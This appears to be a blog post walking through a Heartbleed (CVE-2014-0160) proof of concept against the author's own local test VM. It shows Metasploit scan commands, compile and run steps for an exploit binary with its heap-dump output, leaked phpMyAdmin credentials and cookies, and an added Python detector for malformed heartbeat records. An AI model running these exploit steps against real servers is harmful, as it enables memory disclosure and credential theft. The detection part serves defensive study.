- Heartbleed All Mighty: Easy Explanation How Does It Works
- Heartbleed All Mighty: How Can This Be?!
- Heartbleed All Mighty: Massive Security Bug In OpenSSL
In my status a while ago, I actually intended to launch a PoC of the Heartbleed Bug on April 11. But my brother Krisan Alfa suggested that I run the attack against a local server instead, so that nobody else would be harmed. Makes sense! And one of my partners, Alfath, suggested the same thing. So I decided to build my own vulnerable server to realize this PoC. Thanks both of you, guys! You rock!
A PoC itself has a structure that is ideally (in my opinion) laid out like this:
- Introduction of Bug
- Explanation how Bug works
- Po(Bug)C [Proof of Bug Concept]
- Prevent Bug
Here is the specification of the vulnerable server I built:
- Debian 7.4.0 Wheezy amd64
- Kernel 3.2.0-4 (included in Debian 7.4.0)
- Apache 2.4.9
- PHP 5.4.27
- OpenSSL 1.0.1e
- PHPMyAdmin 4.1.13
- Server installed on vmplayer 6.0.1
- Server IP Address 192.168.145.128
- HTTP web service 192.168.145.128:80
- HTTPS web service 192.168.145.128:443 (this is the port we will test)
Here are the tools I used to carry out the penetration test:
And do you know how long it took me to build this vulnerable server? 10 hours! Anyway, back to the PoC. And here we go!
Metasploit in Action
In this tutorial I use the heartbleed auxiliary module to scan the target and find out whether the machine can be exploited:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
Then I set RHOSTS to the target IP, 192.168.145.128:
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.145.128
And then:
msf auxiliary(openssl_heartbleed) > exploit
[+] 192.168.145.128:443 - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
BOOM! The scan result says this server is vulnerable to the Heartbleed Bug, CVE-2014-0160.
Let's Load The Gun!
Copy the C code below or download it, then rename it to heartbleed.c.
Compile the source with gcc.
NOTE: The GCC version I used is: Debian 4.6.3-14 4.6.3
HOW TO COMPILE ON DEBIAN
$ gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
HOW TO COMPILE ON ARCH
$ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
If you are on a DEBIAN-based distro and the build FAILS, try the ARCH LINUX version!
Thanks to Damar Bungispo Girhan for pointing me to that problem! :D
After that, a heartbleed binary will appear in your working directory. Check the binary with the command:
$ file heartbleed
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, not stripped
Strip the binary with the command:
$ strip heartbleed
Then check the binary again with the command:
$ file heartbleed
heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, stripped
Locked and loaded!
How to Use Heartbleed Exploit?
$ ./heartbleed
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ try --help
$ ./heartbleed --help
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[
[ --server|-s <ip/dns>   - the server to target
[ --port|-p <port>       - the port to target
[ --file|-f <filename>   - file to write data to
[ --bind|-b <ip>         - bind to ip for exploiting clients
[ --precmd|-c <n>        - send precmd buffer (STARTTLS)
[                          0 = SMTP
[                          1 = POP3
[                          2 = IMAP
[ --loop|-l              - loop the exploit attempts
[ --type|-t <n>          - select exploit to try
[                          0 = null length
[                          1 = max leak
[                          n = heartbeat payload_length
[
[ --verbose|-v           - output leak to screen
[ --help|-h              - this output
[
Shoot the heart!
$ ./heartbleed -s 192.168.145.128 -p 443 -t 1 -f dumpfile
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.145.128 443/tcp
[ connected to 192.168.145.128 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'dumpfile'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'dumpfile'
[ done.
He's bleeding like a woman on her period! LOL! Now let's look at our dump:
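The type=24 records in the output above are TLS Heartbeat messages (RFC 6520), and the bug is nothing more than a heartbeat request whose payload_length field claims more bytes than the record actually carries. The same inequality that the OpenSSL fix checks can serve as a detection rule on a sensor or a TLS-terminating proxy. The Python below is an added example, not the post's tool or the Metasploit module; the sample records are constructed plaintext heartbeats, and the field names are this example's own.

```python
"""Flag TLS Heartbeat records whose claimed payload_length exceeds what the
record actually carries (CVE-2014-0160). Added example, not the post's tool."""
import struct

TLS_HEARTBEAT = 24          # TLS record content type for Heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16            # RFC 6520 requires at least 16 bytes of padding


def parse_heartbeat_record(record: bytes) -> dict:
    """Return the header fields of a plaintext TLS record carrying a heartbeat."""
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, rec_len = struct.unpack("!BHH", record[:5])
    if ctype != TLS_HEARTBEAT:
        raise ValueError(f"not a heartbeat record (content type {ctype})")
    body = record[5:5 + rec_len]
    if len(body) < 3:
        raise ValueError("truncated heartbeat message")
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    return {"version": version, "record_len": rec_len, "hb_type": hb_type,
            "payload_len": payload_len, "carried": len(body) - 3}


def is_heartbleed_request(record: bytes) -> bool:
    """True when a heartbeat request claims more payload than it carries.

    The OpenSSL fix rejects a message when 1 + 2 + payload_length + 16 exceeds
    the record length; an unpatched 1.0.1 copies payload_length bytes from the
    heap into its reply. The same inequality works as an IDS rule."""
    hb = parse_heartbeat_record(record)
    return (hb["hb_type"] == HB_REQUEST
            and 3 + hb["payload_len"] + MIN_PADDING > hb["record_len"])


def is_leaking_response(request: bytes, response: bytes) -> bool:
    """True when a response echoes more payload than the request supplied."""
    req, resp = parse_heartbeat_record(request), parse_heartbeat_record(response)
    return resp["hb_type"] == HB_RESPONSE and resp["carried"] > req["carried"]


# Constructed plaintext samples (what a sensor or TLS-terminating proxy would see).
# Benign: payload_length 3 for "ABC" plus 16 bytes of padding -> body is 22 bytes.
BENIGN_REQ = bytes.fromhex("18 0302 0016 01 0003 414243" + "00" * 16)
# Malformed: payload_length 0xFFFF but only the 16 padding bytes follow -> body 19 bytes.
BAD_REQ = bytes.fromhex("18 0302 0013 01 ffff" + "00" * 16)
# Reply to BAD_REQ from a vulnerable server: 64 payload bytes the client never sent.
LEAKY_RESP = bytes.fromhex("18 0302 0053 02 0040") + b"\x41" * 64 + b"\x00" * 16
```

In a real capture the heartbeat rides inside the encrypted record layer, so the request rule is only applicable before the handshake completes or at a point where the plaintext is available; the response-size check needs only record lengths and works either way.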
Buried in the leaked heap is the PHPMyAdmin login POST body, in plaintext:
pma_username=root
pma_password=password
The same dump also carries the phpMyAdmin session cookie, the pmaUser-1/pmaPass-1 cookies and the request token from an earlier visit, so on a real server rotating the password alone would not be enough.
YOU ARE SO OWNED BY RED-DRAGON @-)